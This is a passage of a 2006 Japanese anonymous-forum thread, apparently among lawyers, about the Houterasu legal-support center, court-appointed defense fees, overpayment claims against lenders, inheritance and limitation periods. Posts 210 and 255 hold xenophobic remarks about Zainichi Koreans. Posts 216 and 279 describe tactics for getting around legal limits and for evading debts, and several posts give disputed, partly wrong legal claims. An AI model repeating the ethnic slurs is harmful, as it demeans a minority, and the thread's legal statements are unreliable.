204 :無責任な名無しさん:2006/06/18(日) 16:49:24 ID:C7Qp/T4c
>>190
地方だと,良く言えば「安売りしない」,悪く言えば黙示的な価格カルテルができるからなんとかなるのだよ。


205 :無責任な名無しさん:2006/06/18(日) 16:51:40 ID:C7Qp/T4c
勘違いしてもらいたくないな。
我々在野法曹は,弁護士の面子は守りたいが,法テラスなどというものを作らせた執行部の面子は 潰したい のだ。

206 :無責任な名無しさん:2006/06/18(日) 21:51:17 ID:TBmmzVeV
「我々在野法曹」と一括りにしないでくれ。
>>205のようなチンケな自尊心の持ち主と一緒にされてはこちらが迷惑だ。

207 :無責任な名無しさん:2006/06/19(月) 07:16:30 ID:RQ0+TWIE
TNが今度は名無しで暴れてるねw

208 :無責任な名無しさん:2006/06/19(月) 08:45:43 ID:x9bpC04H
呆テラスなど、俺は協力しないからどうでもいい。
それより、弁護士が増えるなら、きちんと会費もやすくしてよね。

それと、
いちいち連絡をファックスで送るのは止めて欲しい。
重要な連絡ならともかく、その他はメールで十分。

209 :無責任な名無しさん:2006/06/19(月) 08:47:18 ID:Ece5c+LB
法テラスについては、弁護士も協力するよう法律に書かれちゃってるそうなので、
協力しないと弁護士が悪者にされそうなんだよな。


210 :無責任な名無しさん:2006/06/19(月) 10:02:31 ID:7M4r2TJe
在日を北に送り返す法律を!

211 :無責任な名無しさん:2006/06/19(月) 10:17:57 ID:y4uRWGmD
ウチの会ではまだ法テラス登録の案内が回ってこないけど、登録しなくてもいいということなのだろうか。

212 :通りすがり:2006/06/19(月) 12:04:42 ID:jKB5ylGX
橋○弁護士が、テレビで過払い請求をすべきだと喋っているのを見て
相談に来たという依頼者が今来たよ。
そんなことテレビで言って、チワワに怒られないかい?

213 :無責任な名無しさん:2006/06/19(月) 12:17:51 ID:lLCP38gY
H先生って、以前、サラ金の顧問をしていなかったっけ。
やめてからでも、債務者側につくのは問題ないのかな。

214 :無責任な名無しさん:2006/06/19(月) 12:43:58 ID:5kj1v3ix
もう手のひら返した後ですから。

215 :無責任な名無しさん:2006/06/19(月) 14:14:29 ID:jKB5ylGX
○イックファイナ○○は、140万円を越える過払請求の事案でも、司法書士を代理人として示談をしているようだ。
おーい関係委員会よ何とかしてくれよ。

216 :無責任な名無しさん:2006/06/19(月) 14:28:30 ID:Ece5c+LB
>>215
あれ、テクニックがあるのよ。
過払い請求って、和解するまではいくらになるのか分からないところがあるでしょ?
140万円以上の過払請求ができそうでも、140万円の事件として受けて代理人交渉することは可能なわけ。
で、140万円を超える過払い請求が可能になったときは、和解の直前で辞任して、本人が和解することにするの。


217 :無責任な名無しさん:2006/06/19(月) 14:49:13 ID:y4uRWGmD
>>209
協力義務は書かれてても登録義務はないからいいんでないの。

218 :無責任な名無しさん:2006/06/19(月) 14:53:21 ID:5kj1v3ix
オレ、最近過払い請求するだけ司法書士の中ではまともな方かなと思い始めたよ。

やってる管財事件、100万円を超える保険の解約返戻金を拡張して自由財産に
したあげく、満額配当して、管財人報酬を支払った残額を破産者に返すことになりそう。

今日は今日で、主債務者がぶっとんだので、司法書士に相談したら、あんたは
があるから全額払えと言われてSFCGのいうとおり全額払っちゃった保証人が
過払金取り返したいと電話かけてくるし。

219 :無責任な名無しさん:2006/06/19(月) 16:29:43 ID:gCD2Ward
弁護士大増員時代をむかえての弁護士求人に関する緊急調査のお願い
(三度目のご依頼)w

        ,,ィ≦テ三三テ≧ュ- 、
      ィ州ii} |!{ヾ(((ヾ(((ハ三ミミ 、
     〃/ノノリ |ヽ.._ノヽ   }}ミミミミh、
    〃//〃  |      ヽ=ノ ;'⌒ヽ}}ミl、
   ,}}| 川|{   ノ     ((⌒ ノ     }}}li
   /川||}!}i|           ̄      }州
   レ {!州!|     ,x‐  ̄ ヽ   ,.z==〃/
   l!( リノ川      <( ハ〉 ノ   { ,ィTヽ /
   トvソノ}}ハ)、        ̄ ノ    l ` ̄ {
   ))ト〃 }|::ヽ            i     ′
    /ノ》州}}}ィ::、     イ    l   ′
    ((∧  州}ソ,ノ   / ` = _ノ   ′
     }  \  ヾィ    ノー- __ -  ,'
    ′   \  ` 、    -‐-  イ
    ′       \   `   __ ,/ l
   ′        \ ヽ       |

  モーネ・アホカト[Maulnen Ahoccato]
     (1666〜1738 フランス)


220 :無責任な名無しさん:2006/06/19(月) 21:41:55 ID:6hSMbuUO
今日、昼前、東京地裁警視庁側出入り口にアジシスがいましたね。
相変わらずというか、主張を白いプラ版に印刷しており、隣にはバイクがあり、その荷台にはビラがあり「ご自由にお取り下さい」と書いてあった。
拡声器でも演説も、ただ、大声を出すのではなく、メリハリを利かせており、なかなかのものだった。

ただ、一つ欠点があるとすれば、内容が全く論外なんだよな。

221 :無責任な名無しさん:2006/06/19(月) 22:15:11 ID:pLrbEBpe
>>220
実物を見たのですか・・・
怖いもの見たさで一度見てみたい気はしますが。

222 :無責任な名無しさん:2006/06/19(月) 22:25:46 ID:FER7ZI3U
>>221
んなもん一時は毎日見れたわ
もういい加減にしてほしい。普通の人があんなことを警察前でやってもどうしようもないのかな?

223 :無責任な名無しさん:2006/06/19(月) 22:49:44 ID:5kj1v3ix
>>220
問題の裁判官がもう退官したの知らないのかな?

http://www.mainichi-msn.co.jp/shakai/ji/news/20060619k0000m060112000c.html
人事:最高裁(19日)

 最高裁(19日)東京高裁部総括判事(那覇地裁所長)藤村啓▽那覇地裁所長(東京高裁判事)打越康雄

 (18日)退職(東京高裁部総括判事)赤塚信雄

毎日新聞 2006年6月19日 5時00分

224 :無責任な名無しさん:2006/06/19(月) 23:12:16 ID:pvTzaboq
そうすると,マスコミの取材源秘匿を認めた決定が花道ってことか。

225 :無責任な名無しさん:2006/06/19(月) 23:24:40 ID:nxFHSWbL
花道を否定する弁護士もいます
ttp://benli.typepad.com/annex_jp/2006/06/post_8.html

226 :無責任な名無しさん:2006/06/20(火) 00:42:40 ID:hjSWwM7c
>>202
 公正を害する可能性は、少なくとも制度上ある。問題は、公正らしさだ。
 「私は、法テラスという法務省管下の団体と刑事弁護に関する基本契
約をしています。
 しかし、安心してください。職務の独立性・自主性は保たれています。
一緒に法務省をやっつけましょう。」
なんていってお客さんが納得するのかい? 説明責任を果たしているのかい?

227 :無責任な名無しさん:2006/06/20(火) 00:49:38 ID:DYImrbUM
>>225
読んだよー
(つд⊂)ゴシゴシ
( ゚д゚)ポカーン
だったw

228 :無責任な名無しさん:2006/06/20(火) 10:58:01 ID:Jz63+sdY
 現行の国選だって、国から報酬貰っておいて、国家権力と戦いましょうだと思うので、公正らしさという点ではどうだろう?
被告人(被疑者)にとっては、弁護士会が推薦権を事実上もっているかどうかより、個々の弁護人がどういう弁護活動をするかで信頼するしないは決まるように思う。

229 :無責任な名無しさん:2006/06/20(火) 12:11:33 ID:td+QT6W3
そこまで一生懸命国選やっている弁護士がどこまでいるかと

230 :228:2006/06/20(火) 15:06:10 ID:Jz63+sdY
 ちゃんとやらない弁護人は信頼されないということであって、信頼を制度云々と結び付けられるのかと言いたかったわけでつ。

231 :無責任な名無しさん:2006/06/20(火) 15:19:36 ID:td+QT6W3
なるほど

232 :無責任な名無しさん:2006/06/20(火) 15:21:45 ID:3XfSJJcu
接見で5分も話せばたいていの被告人とは信頼関係は築ける
5分で築けない被告人とはたいてい最終的にも信頼関係は築けない

233 :無責任な名無しさん:2006/06/20(火) 15:40:56 ID:1+CEKOL4
せんせぇ、どのくらいになりますかね?
と被告人がいうときのニヤリがすごく嫌いだ・・

234 :無責任な名無しさん:2006/06/20(火) 16:13:10 ID:DsUFXjtj
扶助や国選は懲戒のもとだよねえ。
元々信頼関係がない上に、報酬は原価割れだから、どうせ半分ボランティアだからと
手を抜きがちになるが、どっこい依頼者には変に権利意識が強いのがいるんだよね。3000人時代の
新人には建前だけではなく、よくよく注意を喚起してやる必要があるわな。

235 :無責任な名無しさん:2006/06/20(火) 17:34:31 ID:td+QT6W3
>>233
そもそも国選

236 :無責任な名無しさん:2006/06/20(火) 21:37:36 ID:nekOqj6B
>>235
量刑の話でしょ?
人の関心として量刑に一番興味があるのは重々理解できるけど,
そこを飲み込まないと反省しているとは言えないよね。
聞かなかった被告人は皆無だが。

237 :無責任な名無しさん:2006/06/20(火) 22:36:50 ID:UMbYswWC

広島高裁判決(控訴棄却)
http://courtdomino2.courts.go.jp/kshanrei.nsf/webview/DB35ABFE0BC4594249256BB200385F3D/?OpenDocument

最高裁判決(破棄差戻)
http://www.courts.go.jp/hanrei/pdf/20060620163659.pdf

量刑の問題は別として,被害者を姦淫目的で死亡させた後に死体を姦淫しても,裁判所の解釈だと強姦致死が成立するんだな・・・という発見があった。

238 :無責任な名無しさん:2006/06/20(火) 23:03:09 ID:eIukJHJ8
>>237
なぜそんな当たり前のことを?
姦淫目的で死亡させたあと何もしなくても強姦致死でしょ。
よく試験通ったな。

239 :無責任な名無しさん:2006/06/20(火) 23:09:22 ID:DYImrbUM
姦淫が未遂でも強姦致死ですよ
強姦する機会に被害者を殺したり死なせたりすれば
姦淫の有無を問わず強姦致死罪になります(殺意があれば殺人罪との観念的競合)

240 :無責任な名無しさん:2006/06/20(火) 23:09:55 ID:PWekWV5n
>>228
 一応,傾聴に値する立論だろうとは思う。敢えて反論するとすれば,国選弁護人選
任を「命令する」のは,敵役(一方当事者である)検察庁(法務省)ではなく,
一応無罪推定の立場にある「(起訴状をもらっただけの)裁判所」だということだね。
 報酬算定の問題だが,「無罪判決」を得た場合,「ご苦労様」ということで通常の
国選報酬より多少色を付けてくれる様子(当職は国選で無罪を得たことはない
のでよく知らないが,私選の場合は,刑訴法で費用保障が定められている)。
 今度の崩テラスでは無罪判決をもらっても何らの割り増し報酬もないのだよ。

241 :無責任な名無しさん:2006/06/20(火) 23:10:55 ID:xNfVV02p
>>238
ひんと:ここは2ちゃん(ry

242 :無責任な名無しさん:2006/06/20(火) 23:31:30 ID:PWekWV5n
>>240
 まぁ,このたびの「崩テラス法」でも,国選選任命令を出すのは,裁判所なん
だけどね。ただ,「対立当事者の運営する団体に加入していないと国(裁判所)
から選任命令はもらえない」ということだyo(みんな私のいいたいことは分かっ
てくれたと思うけど,訂正しておきます)。
 それにしても,すごい報酬減額じゃないの? 現在の国選報酬も100円値下
げでぶんむくれだけどね。日弁は,毎年「国選報酬増額」と言っているけど「値下
げ」されたら抗議声明出してるのかね? 「100円でがたがた言うな?」という
のが平山のスタンスなのか? さすがに快調になるくらいの人は鷹揚だね。

243 :無責任な名無しさん:2006/06/21(水) 00:09:23 ID:HYNXrw+Y
まあ理論的、政策的、思想的あれこれはどうであれ。おいらは法テラスには登録しませんよ。元々国選してなかったし。
ところで合格者のレベルが落ちたのか、非弁が入り込んでるのか。窃盗未遂でも殺したら強盗致死既遂と同じ理屈だよね。もう数年刑事やってないので、間違えてたらごめんちゃ

244 :無責任な名無しさん:2006/06/21(水) 01:05:43 ID:ppUWH2h/
確かに国選の新報酬基準は大幅な減額。
地裁通常事件は8万5千円から8万円に5千円の減額。
即決裁判に至っては起訴前と公判あわせて6万2千円。
労働者ならストライキをするところだ。


245 :無責任な名無しさん:2006/06/21(水) 01:27:08 ID:G+fOSP08
あれは懲戒申立てして反省を求めてもよいのではないか。

246 :無責任な名無しさん:2006/06/21(水) 02:42:18 ID:deAXjGhZ
なんで>>237みたいな
非弁が来るのだろうか。

247 :無責任な名無しさん:2006/06/21(水) 07:03:45 ID:9qXTN/Xc
久しぶりに大馬鹿を見た。

248 :無責任な名無しさん:2006/06/21(水) 08:14:33 ID:WoX/2+/+
>>244
労働契約ではないが,時給に換算して最低賃金を割るかもしれん。

249 :無責任な名無しさん:2006/06/21(水) 08:23:34 ID:dsCaeI0Z
弁護士なのにデート断られた
悲しい

250 :無責任な名無しさん:2006/06/21(水) 08:26:17 ID:5hODJPp4
国選の要件を厳格に審査して、
私選が増えれば、トータルでは変わらんのでは。

251 :無責任な名無しさん:2006/06/21(水) 09:04:03 ID:RHqW7mvo
>>250
私選はとりっぱぐれがあるから、国選のほうが良かったりすることもあるのだが。
在宅事件とか家族の依頼からの私選ならいいんだが、身柄拘束中の被告人の
「私選でお願いしたい。預貯金はあるので、必ず支払う。」という申し出ぐらい、
あてにならないものはない。



252 :無責任な名無しさん:2006/06/21(水) 09:43:26 ID:J4r2FFwN
光市殺人事件のその後の経緯は、まるで仇討ち時代劇を見ているかのようだ。
本村氏は見事本懐を遂げて妻子の仇を討った。しかし、果たして、仇討ちに捧げた人生は
良きものだったのか。亡くなった妻子はそんな生き方を喜んでいるのか。きっと人生の
最終章にならないとわからないのだろうね。
被害者の刑事司法への参加が言われているが、いろいろ考えさせられるね。

253 :無責任な名無しさん:2006/06/21(水) 09:54:19 ID:mYaxc/8a
きっと、この人の人生は、この人の希望通りの判決が出て、
刑が執行されても、この事件のみが、これからもこの人の
「仕事」になっていくんだろう。

そういう人は、犯罪被害者になった人の場合結構いる。
犯罪のために人生を変えられてしまった典型的なケース。


254 :無責任な名無しさん:2006/06/21(水) 10:13:02 ID:UVNfK3wH
それも含めて被害なんだろうし、加害者が100%悪いということには
かわりないわな。

255 :無責任な名無しさん:2006/06/21(水) 10:27:35 ID:n1+Yaoyr
安田は麻原とか福田孝行とか在日の弁護に熱心。
安田も在日っぽいな。

256 :無責任な名無しさん:2006/06/21(水) 10:54:55 ID:HLnbEKNu
>>249
>弁護士なのに
そういうことを言ってるから断られ(ry



・・・非弁乙

>>251
つ刑事はやらない

257 :無責任な名無しさん:2006/06/21(水) 11:01:46 ID:Nb8hTpF8
被告人とその関係者の被害者に対するケアのしかたで刑が変わるのは当然として,
被害者が熱心かそうでないかで刑が変わるのはおかしな話。
運次第ということになってしまう。

258 :無責任な名無しさん:2006/06/21(水) 11:35:56 ID:Pw/6zJZd
あの事件で気になるのは他の遺族はどう思ってるのかなあということだな。
夫兼父親だけが遺族ではなかろう。

うちの研修所のクラスのMLに、2chニュー速+レベルの単純な意見を
垂れ流すのがいて辟易してる。あんなのが法曹の価値を下げてるんだな
と思う。

259 :無責任な名無しさん:2006/06/21(水) 11:56:55 ID:HLnbEKNu
今研修所ってML使ってんだ…。
時代の移り変わりが(ry

260 :無責任な名無しさん:2006/06/21(水) 14:42:11 ID:IcSM59B9
死刑回避の理由が見あたらない
って言うんなら自分で死刑判決しろよ。
そんなことだから裁判所を世間が信用しないんだ。

261 :無責任な名無しさん:2006/06/21(水) 15:19:39 ID:XO16eyq5
>>260
当方非弁ですが。
最高裁が原審破棄・自判しなかったのは、自分たちが泥水をかぶりたくなかったからでは???
つまり、高裁に死刑判決をさせることによって死刑廃止論者の矛先を自分たちに向けさせないための策略だったのでは???

或いは、高裁で再審理させればそれで十分と思ったからでは???

262 :無責任な名無しさん:2006/06/21(水) 16:48:26 ID:n1+Yaoyr
>>258
お前は何様?
死刑反対が進歩的でかっこいいとでも思ってるの?
お前みたいなのがいるから法匪と批判されるんだよ。


263 :無責任な名無しさん:2006/06/21(水) 17:13:17 ID:J4r2FFwN
思想的・歴史的に死刑廃止が進歩的であることだけは間違いないだろう。

264 :無責任な名無しさん:2006/06/21(水) 17:25:07 ID:PCN/5YrU

>うちの研修所のクラスのMLに、2chニュー速+レベルの単純な意見を
垂れ流すのがいて辟易してる。あんなのが法曹の価値を下げてるんだな
と思う。

でもまあ、自分と意見が違う人間を罵倒するあたりは一人前の法曹といえるな。

265 :無責任な名無しさん:2006/06/21(水) 18:03:18 ID:Pw/6zJZd
>>262
感情論だけで議論するなら法律家はいらない。
非弁がこのスレで暴れても、さげすまれるだけだ。

>>264
なるほどね。ただ、論理的に罵倒されるなら相手
しようかという気になるけど、感情論振り回されて
もね。

266 :無責任な名無しさん:2006/06/21(水) 18:10:19 ID:2GknKYXf
>>262
非弁乙

267 :無責任な名無しさん:2006/06/21(水) 18:28:21 ID:rd99X5pc
>>258
議論をすること自体は構わないし、MLの存在意義を考えればそれは一応歓迎するが、MLで意見を押しつけてくるのは辟易するね。
ビラの裏にでも書いていればいいじゃないかと思う。

刑事弁護フォーラムのMLで時々そんなことを感じます。

268 :無責任な名無しさん:2006/06/21(水) 22:58:04 ID:Audcg4Uc
福田孝行さんの名前を出すのは人権侵害だ。
ましてや顔写真をネット上に晒すのはもってのほか。

http://www.taconet.com.tw/AdTaconet/-eaa0f8c7d94017d45285d0a180ae217d|1150897778-/dynamic_frame.htm?sid=nec007/yamaguchishikan.htm&TACO=eaa0f8c7d94017d45285d0a180ae217d|1150897778


269 :無責任な名無しさん:2006/06/22(木) 06:20:53 ID:+CpmTkeO
押しつけがましい意見だと思ったら読まなきゃいいだけ。
その程度の大人の対応ができないと、ネット社会は生きられない。

270 :無責任な名無しさん:2006/06/22(木) 08:56:39 ID:C1D/wNqk
死刑廃止派の方がよほど押し付けがましいと思います。

271 :無責任な名無しさん:2006/06/22(木) 09:56:09 ID:fsibB34/
>>269
読む前から押しつけがましい意見かどうかを判断する方法を教えてくれないか。

272 :無責任な名無しさん:2006/06/22(木) 11:12:48 ID:WlBp3bHy
それ以上読むなということだろ。


273 :無責任な名無しさん:2006/06/22(木) 15:50:37 ID:DKOgrBzO
最近、相続関係の案件で、被相続人が負債を抱えたまま死亡して、
相続人は負債の内容もよく分からなかったり、土地と建物がそれぞれ
相続人と被相続人所有で所有者が異なってたり、それらに付いてる
抵当権も錯綜してたり、変な仮差しが付いてたり、その仮差しをした人も
死亡してたりなど、ごちゃごちゃになってる相談をいくつか受けた。
自宅をめぐる法律関係が錯綜してるけど、何とか自宅を確保したい
というケースが多い。
限定承認とその後の処理を受任したケースもあるんだけど、この辺の
相続関係は条文などが不備で非常に難渋してる。
特に、限定承認をした後は裁判所がほとんど関与しないというのが
なんとも困る。
もう少し制度を整備できないものだろうか・・・

274 :無責任な名無しさん:2006/06/22(木) 16:33:55 ID:2zqcg3kt
>>273
限定承認は依頼人の意向もあって一度やったことあるけど、正直お勧めできない方法だよねえ。
まず相続人全員の意向が揃わないとダメだし、その後も財産の調査が面倒だし。
厄介なのは、保証債務。裁判所的には借金としてカウントしてくれるんだが、税務署がダメなんだよね。
求償権があるということで、相続税をかけてくる。
手続きが面倒なわりには、報われない制度だよなあ。最初から相続放棄しちゃったほうが、
ある意味よっぽどマシだよね。


275 :無責任な名無しさん:2006/06/22(木) 16:38:30 ID:IGM7Ehxq
今限定承認やっているけど訳分からん。
ここまで裁判所は関与しないことに驚いた。
面倒すぎるー

276 :無責任な名無しさん:2006/06/22(木) 18:12:37 ID:lCNauwXr
ま,官報公告を忘れるなってことだ

277 :無責任な名無しさん:2006/06/22(木) 20:22:09 ID:+RweYYRG
つ弁護士五右衛門「限定相続の実務」(オブアワーズ)

278 :無責任な名無しさん:2006/06/22(木) 20:44:31 ID:t0vEiHMc
>>273
そこで相続財産管理人選任申立ですよ。

279 :無責任な名無しさん:2006/06/23(金) 20:49:22 ID:/Q3fpu11
>>274
 必殺技として、小さい子どもがいる場合は、その子どもを残してみな放棄。
 あとは、その子の法定代理人親権者から委任を受けた代理人として頑張ってみて、
借金の方が多ければ、その子が成人して稼げるようになるまでに時効で飛ばす方法
があります。

280 :無責任な名無しさん:2006/06/23(金) 21:11:53 ID:eOlI/ju2
時効の中断を10年に1度されて、子供が20才を超えたときは金利も含め巨大な雪だるまとなっていましたとさ。

281 :無責任な名無しさん:2006/06/23(金) 21:13:48 ID:iyYpFEuq
>>280
10年なら時効援用すればいいじゃんw

282 :無責任な名無しさん:2006/06/23(金) 21:15:15 ID:x2QE4aSf
>>281
大丈夫か?

283 :無責任な名無しさん:2006/06/23(金) 21:34:43 ID:ztR9souo
>279
何だかよく分からん。
借金もあるけど残したい財産もあるってこと?
それだと債務名義取られて子供名義の財産に強制執行されて終わりでは。


284 :無責任な名無しさん:2006/06/23(金) 23:32:26 ID:X3Xo0yFW
>>281
せめてロー生であることを願うよ
>>279もな。

旧試験受験生ですらないだろ

285 :無責任な名無しさん:2006/06/23(金) 23:35:15 ID:iyYpFEuq
>>284
普通の会社は5年ごとに時効中断するんだけど・・

286 :無責任な名無しさん:2006/06/24(土) 08:18:23 ID:hoZpmb5y
過払請求のみで稼いでた皆さん、残念でした
今後はますます食えなくなるね

http://www.asahi.com/business/update/0624/003.html

287 :無責任な名無しさん:2006/06/24(土) 08:33:57 ID:77ioa9eW
「段階的に」引き下げ
というところがミソか。

288 :無責任な名無しさん:2006/06/24(土) 10:52:26 ID:Ks1u23xV
>>285
「5年ごと」ねえ・・・。

最初は短期消滅時効かもしれないけれど、中断事由で強制力のあるものってなんだったっけ?
その場合は、中断後の時効期間は?

289 :無責任な名無しさん:2006/06/24(土) 10:53:38 ID:Ks1u23xV
そういえば、過払い請求の時効って何年?
タダの不当利得であるわけだから10年でいいんだよね?

クレサラは全くやらないからよくわからんけ。

290 :無責任な名無しさん:2006/06/24(土) 10:56:11 ID:vg9wNnRs
>>288
10年たたないうちに時効援用してしまえば終わりの話じゃん

291 :無責任な名無しさん:2006/06/24(土) 14:42:00 ID:7IdmJZ/x
易々時効援用させてくれるところがどれだけあるのかね
バカか世間知らずか

292 :無責任な名無しさん:2006/06/24(土) 14:57:29 ID:c8GPGtHP
>>289
借主が消費者の場合は10年という判例が一般的。
起算点は全ての過払い金について最終取引日の翌日から。

グレーゾーン引き下げても,これまでの過払いが消えるわけではない。
あと10年くらいは続く。
クレサラ対策は再びヤミ金対策にシフトしていくでしょう。
ヤミ金のほうがやりやすい。不法原因給付で元本も返さなくていいから。

293 :無責任な名無しさん:2006/06/24(土) 16:25:37 ID:Ks1u23xV
>>290
話がかみ合わないなあ。
時効完成前に中断すれば終わりでしょ?
中断事由たる裁判上の請求をすれば、勝訴から10年でしょ?
10年たつ前に訴訟をすればいつまでも消滅時効は完成しないでしょ?

294 :無責任な名無しさん:2006/06/24(土) 16:27:52 ID:Ks1u23xV
>>292
どうもありがとうございます。

ついでに質問ですけど、
過払いの前提として、取引履歴を知りたいのだが、依頼者が
「どっかの業者から10年以上前に何十万か借りたけど、7年くらい前に返し終わった。カードは捨てた。」
と言っているのですが、何か探る手だてはないですかね?

クレサラに詳しい方、教えてください。お願いしまっす。


295 :無責任な名無しさん:2006/06/24(土) 16:48:20 ID:vg9wNnRs
>>293
だから10年ごとに時効中断されたらおしまいだっていってるんだから
そんな馬鹿な債権者がいるんなら5年で時効援用すれば終わりって話なんだけど

296 :無責任な名無しさん:2006/06/24(土) 16:48:46 ID:oNPMEqNQ
>>293
 10年以内に裁判を起こされて負けても、10年で時効になるわけなので、
最長で20年経てば時効で消えるのでは。

297 :無責任な名無しさん:2006/06/24(土) 17:10:16 ID:qU4zULrW
>>295
時効期間が10年なんじゃないの?
債権者が業者ではないとか。

298 :無責任な名無しさん:2006/06/24(土) 17:44:05 ID:wpZ8A9xb
>>297
個人の貸金業者は商人じゃありませんが。
商法総則商行為の本読み直してね。

299 :MS754 ◆yGUnQdhyV2 :2006/06/24(土) 20:47:49 ID:LHhTxcrF
ご無沙汰しています。話の流れを豚切ますが、

本日の果物

メロン  6個  サクランボ  2パック(佐藤錦)



300 :無責任な名無しさん:2006/06/24(土) 21:00:07 ID:QfU//kqa
もうそんな時期か。。
しばらくは、MSせんせのメロンゲット報告が続くわけですな。(にやり)

301 :無責任な名無しさん:2006/06/24(土) 23:06:04 ID:+TgdR+qa
>>294
完済の情報も信用情報に記載されるから,テラネットあたりの自己情報開示請求をさせればいい。
7年前完済では期待できないが・・・(信用情報に登録されてないorすでに抹消)。


302 :無責任な名無しさん:2006/06/24(土) 23:45:50 ID:ltwkqnlM
寺ネットに取引履歴など無い

303 :無責任な名無しさん:2006/06/25(日) 00:18:59 ID:RmHP+ubO
 取引履歴がなくてもどこの業者と取引していたのかは分かるのでは?
 ただ,俺は前から疑問に思っていたのだが,昔取引があって完済し,現在は
残債務のない業者に取引履歴の開示請求をした場合,取引履歴って開示してく
れるのかな?経験ある人いたら教えて。

304 :無責任な名無しさん:2006/06/25(日) 00:27:04 ID:kW4sYVUq
無料のサイトたくさんあるHPだよ
http://www.geocities.jp/hitomijp4390/
おすすめ

305 :無責任な名無しさん:2006/06/25(日) 00:29:25 ID:gs71nFB8
今、約定による完済を理由に開示を拒否する業者はいない。
最高裁が完済した場合でも、履歴が残っているかぎり開示義務があると判示したから。

もちろん、履歴が残ってないといって拒否される場合はある。

306 :無責任な名無しさん:2006/06/25(日) 02:12:04 ID:HlfTV0Yo
質問させて下さい。会社の総務(株式)を担当している者です。
経営が思わしくないため未払金が毎月増え続けているある取引先があるのですが、
自社の役員は破産(債権者による破産)の書類をもって取り立てに行こうとしています。
ようはプレッシャーをかけるためと思われますが、これって脅迫その他の法律にひっかかる
ものではないでしょうか?その申請書類を一式作れと言われているのですが、もし脅迫にあたり
私が書類作成に加担した場合、私もなんらかの責任を負わなくてはならないのでしょうか?
法律に詳しい方教えてください。


307 :無責任な名無しさん:2006/06/25(日) 02:47:27 ID:552xMvRG
クレサラが闇金ばっかりになったら、ビジネスとして機能しないだろうな。

308 :無責任な名無しさん:2006/06/25(日) 04:13:29 ID:TUOlgbQz
グレーゾーンが廃止されたら弁護士の食いブチは減りますか?

309 :無責任な名無しさん:2006/06/25(日) 04:30:19 ID:lhPB9Ld+
>>306
会社なら顧問弁護士ぐらいいるだろう。そちらに相談しなさい。

310 :無責任な名無しさん:2006/06/25(日) 08:16:12 ID:+4jGvVeG
2chで法律相談するやつの気が知れね。

311 :無責任な名無しさん:2006/06/25(日) 08:37:38 ID:/nmctCOM
2chはタダだからね

312 :無責任な名無しさん:2006/06/25(日) 09:13:13 ID:Wy0jrSIC
質問自体、馬鹿の発想の極みだなw

313 :無責任な名無しさん:2006/06/25(日) 09:17:12 ID:/nmctCOM
当事者本人が弁護士装っての質問でしょう

314 :無責任な名無しさん:2006/06/25(日) 10:25:31 ID:552xMvRG
このスレ見てると弁護士さんて性格悪い人多いですね。
数を増やして淘汰しないといけないとみんなが思ったのも当然かもしれません。

315 :無責任な名無しさん:2006/06/25(日) 10:50:44 ID:vyh2zuNB
今後は楽して弁護士になって金儲けとか、楽して弁護士になって社会から偉い人といわれたいとか思っているような性格が悪く、さらに法律をろくに知らない奴らも増えるから、世間のみんなは大変ですね。

ま、文句は小泉さんに

316 :無責任な名無しさん:2006/06/25(日) 11:33:50 ID:c1RiMU8S
>>314、315
 あんたの言うことは間違っていないと思いますよ。
 お疲れサン。 非弁は、退場してください。


317 :無責任な名無しさん:2006/06/25(日) 14:27:35 ID:u5djAJ9/
http://www.nego.co.jp/

あからさまな非弁活動wwwwwwwwww

318 :無責任な名無しさん:2006/06/25(日) 14:34:02 ID:1fdVTGZ/
>>317
>よくある質問
>弁護士が必要な場合はどうするのですか?
>顧問弁護士よりアドバイスを頂いておりますが、法律的にネゴシエーターズが
>対応できない案件につきましてはご紹介させて頂きます。
>当然ながら、成功報酬ではなく、弁護士費用が必要になります。

この会社の顧問弁護士って・・・w


319 :無責任な名無しさん:2006/06/25(日) 14:56:38 ID:FTmZMnEE
>>301,302

最近,完済の事例でもなるべき過払を回収しよう
と思い,FCBJやCICの信用情報を依頼人
からとってもらうようにしています。この情報
のおかげでスムーズに回収できた例もでてきま
した。テラネットだと消費者金融も信販系も同
時に取得できるのか・・知りませんでした。

皆様はどのくらいこれらの信用情報を利用して
いるんでしょうか。




320 :無責任な名無しさん:2006/06/25(日) 16:14:45 ID:7F5u8mNO
成功報酬30%なんて,弁護士でもそんなに取らない。
認定司法書士がカバーすべき業務分野だね。

ここは非弁調査はされてないの?

321 :無責任な名無しさん:2006/06/25(日) 19:29:56 ID:OsIB00+V
>>317
そのページの交渉事例を見てみ?
保証金8000万を4000万取り返し、成功報酬200万とか、え〜〜〜っていうようなのが結構あるw

322 :無責任な名無しさん:2006/06/25(日) 19:32:12 ID:I5AsAIvd
>>319
本人の記憶がメインでしょ
つーか、最近っていうのがすごいな


323 :無責任な名無しさん:2006/06/25(日) 22:46:37 ID:cYTvQMCf
非弁の通報ってどこにすればいいの?
日弁連に非弁提携問題対策委員会はあるけど、非弁〜もあるのかな

324 :無責任な名無しさん:2006/06/25(日) 22:53:43 ID:oTBg4R7K
非弁護士活動取締委員会

325 :無責任な名無しさん:2006/06/25(日) 23:18:44 ID:hKzDpbMg
★損害賠償、刑事訴訟で請求可能に・法務省方針

 法務省は犯罪者を裁く刑事訴訟の法廷で被害者が被った損害の賠償に関する
審理を同時に進め、有罪の場合は同じ裁判官が賠償命令も出す「付帯私訴」
制度を導入する方針だ。刑事訴訟と別に被害者が損害賠償を求める民事訴訟を
起こさなくてはならない現行制度に比べ、迅速に結論が出るため、被害者救済に
役立つと判断した。

 10月にも法制審議会(法相の諮問機関)に制度創設を諮問。
付帯私訴導入を盛り込んだ刑事訴訟法改正案を早ければ来年1月召集の
通常国会に提出する。

日経新聞 http://www.nikkei.co.jp/news/seiji/20060625AT3S2302C24062006.html


326 :無責任な名無しさん:2006/06/26(月) 01:35:29 ID:rnyRx+dD
http://www.nego.co.jp/

ここまでおおっぴらな非弁活動は見たことないw

327 :無責任な名無しさん:2006/06/26(月) 11:54:45 ID:FHf3W3pR
>325
 交通事故なんかで、症状固定まで時間がかかるような案件は、一部請求という形になるのかな。それでも、過失割合の決着が早期につく点のメリットはあるかな。
しかし、損保弁護士としては、被害者に少しでも多く払って情状を有利にしたい被告人と、損保会社との利害関係がどうなるかという気がするね。裁判所案を貰う形になるかね。
 また、資力がない被告人の場合は、結局一緒かな。刑務所での労務金の差押とかは出来るのだろうか?保釈事案では、返還された保釈保証金から払うみたいな和解になるのだろうか?


328 :非弁取締委員会:2006/06/26(月) 12:00:01 ID:BQQQbgaH
>>317 320 323 326
非弁乙 うざい


329 :無責任な名無しさん:2006/06/26(月) 12:17:16 ID:MZT0TQQm
328 名前:非弁取締委員会 投稿日:2006/06/26(月) 12:00:01 ID:BQQQbgaH
>>317 320 323 326
